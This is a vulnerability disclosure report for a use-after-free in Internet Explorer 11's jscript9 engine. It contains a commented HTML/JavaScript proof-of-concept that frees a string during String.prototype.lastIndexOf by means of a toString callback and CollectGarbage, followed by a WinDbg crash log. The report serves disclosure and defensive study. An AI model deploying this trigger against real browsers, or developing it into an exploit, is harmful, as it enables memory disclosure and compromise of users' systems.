There is a use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure.
This was tested on IE11 running on Windows 7 64-bit with the latest patches applied.
PoC:
```
<!-- saved from url=(0014)about:internet -->
<script>
// Two slots shared between main() and the f8 callback:
// vars[0] holds the large array, vars[1] the string derived from it.
var vars = new Array(2);
// Builds a large string, then calls a native string builtin whose position
// argument is an object with a script-defined toString. Argument conversion
// re-enters script (f8) while lastIndexOf is still on the native stack.
// Bug class (hedged, not stated in the report): a builtin taking a raw pointer
// into a collectable buffer before all arguments are converted. The engine-side
// fix for this class is to convert every argument first, or keep the string
// reachable across the callback; the debug log places the fault inside
// JavascriptString::EntryLastIndexOf, consistent with that.
function main() {
// Sparse array of length 1e6; its string form is the ","-join of its holes.
vars[0] = new Array(1000000);
// substr applies ToString to its `this`, so vars[1] is a large string
// (the join minus its first 100 characters).
vars[1] = String.prototype.substr.call(vars[0], 100);
// lastIndexOf applies ToNumber to `position`. ToPrimitive tries valueOf first;
// Object.prototype.valueOf returns the object itself, so toString (f8) is called.
var o = {}; o.toString = f8;
// The search string "a" never occurs in a run of commas; the point is the
// callback that runs mid-call, not the result of the search.
String.prototype.lastIndexOf.call(vars[1], "a", o);
}
// Installed as o.toString in main() and invoked by the engine during
// lastIndexOf's argument conversion. toString is called with no arguments,
// so arg7..arg9 are always undefined and unused.
function f8(arg7, arg8, arg9) {
// Shows the large string in a modal dialog. Whether the dialog itself is
// needed for the trigger is not stated in the report.
alert(vars[1]);
// IE/JScript-specific: forces a garbage collection while the native
// lastIndexOf frame is still live (see the stack in the debug log).
CollectGarbage();
}
// Runs during script parsing; the "saved from url" comment at the top of the
// page is IE's Mark of the Web, placing the file in the Internet zone.
main();
</script>
```
Debug log:
```
(abc.db8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000061 ebx=09929e60 ecx=0ea5848c edx=09555230 esi=0e8700d8 edi=000f41db
eip=6cd18341 esp=0a0cb330 ebp=0a0cb588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
jscript9!Js::JavascriptString::EntryLastIndexOf+0x15d:
6cd18341 663901 cmp word ptr [ecx],ax ds:002b:0ea5848c=????
0:008> k
# ChildEBP RetAddr
00 0a0cb588 6cbe6a49 jscript9!Js::JavascriptString::EntryLastIndexOf+0x15d
01 0a0cb5d4 6cc74ad1 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
02 0a0cb5f8 6cbf12fb jscript9!Js::JavascriptFunction::EntryCall+0x95
03 0a0cb808 6cbf1689 jscript9!Js::InterpreterStackFrame::Process+0xc6d
04 0a0cb93c 0b5c0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
WARNING: Frame IP not in any known module. Following frames may be wrong.
05 0a0cb948 6cbf12fb 0xb5c0fe1
06 0a0cbb48 6cbf1689 jscript9!Js::InterpreterStackFrame::Process+0xc6d
07 0a0cbc64 0b5c0fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
08 0a0cbc70 6cbe6a49 0xb5c0fe9
09 0a0cbcb4 6cbe6f78 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
0a 0a0cbd28 6cbe6ead jscript9!Js::JavascriptFunction::CallRootFunction+0xb5
0b 0a0cbd70 6cbe6e40 jscript9!ScriptSite::CallRootFunction+0x42
0c 0a0cbdbc 6ccf45cf jscript9!ScriptSite::Execute+0xd2
0d 0a0cbe44 6ccf38ee jscript9!ScriptEngine::ExecutePendingScripts+0x1c6
0e 0a0cbed8 6ccf4e0a jscript9!ScriptEngine::ParseScriptTextCore+0x300
0f 0a0cbf28 6dea5fd8 jscript9!ScriptEngine::ParseScriptText+0x5a
10 0a0cbf60 6db53f88 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
11 0a0cbfb8 6de4c88f MSHTML!CJScript9Holder::ParseScriptText+0x5f
12 0a0cc028 6db542a7 MSHTML!CScriptCollection::ParseScriptText+0x175
13 0a0cc114 6db5495d MSHTML!CScriptData::CommitCode+0x31e
14 0a0cc194 6db552ac MSHTML!CScriptData::Execute+0x232
15 0a0cc1b4 6de7b156 MSHTML!CHtmScriptParseCtx::Execute+0xed
16 0a0cc208 6d89b11e MSHTML!CHtmParseBase::Execute+0x201
17 0a0cc224 6d89ab57 MSHTML!CHtmPost::Broadcast+0x182
18 0a0cc35c 6d92bc2d MSHTML!CHtmPost::Exec+0x617
19 0a0cc37c 6d92bb93 MSHTML!CHtmPost::Run+0x3d
1a 0a0cc398 6db19a4e MSHTML!PostManExecute+0x61
1b 0a0cc3ac 6db1a128 MSHTML!PostManResume+0x7b
1c 0a0cc3dc 6db0e272 MSHTML!CHtmPost::OnDwnChanCallback+0x38
1d 0a0cc3f4 6d7f604e MSHTML!CDwnChan::OnMethodCall+0x2f
1e 0a0cc444 6d7f5b9a MSHTML!GlobalWndOnMethodCall+0x16c
1f 0a0cc498 74ed62fa MSHTML!GlobalWndProc+0x103
20 0a0cc4c4 74ed6d3a user32!InternalCallWinProc+0x23
21 0a0cc53c 74ed77c4 user32!UserCallWinProcCheckWow+0x109
22 0a0cc59c 74ed788a user32!DispatchMessageWorker+0x3b5
23 0a0cc5ac 6ed9abdc user32!DispatchMessageW+0xf
24 0a0cf778 6edcecb8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
25 0a0cf838 76c8971c IEFRAME!LCIETab_ThreadProc+0x3e7
26 0a0cf850 74493a31 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
27 0a0cf888 7507336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
28 0a0cf894 775698f2 kernel32!BaseThreadInitThunk+0xe
29 0a0cf8d4 775698c5 ntdll!__RtlUserThreadStart+0x70
2a 0a0cf8ec 00000000 ntdll!_RtlUserThreadStart+0x1b
0:008> r
eax=00000061 ebx=09929e60 ecx=0ea5848c edx=09555230 esi=0e8700d8 edi=000f41db
eip=6cd18341 esp=0a0cb330 ebp=0a0cb588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
jscript9!Js::JavascriptString::EntryLastIndexOf+0x15d:
6cd18341 663901 cmp word ptr [ecx],ax ds:002b:0ea5848c=????
```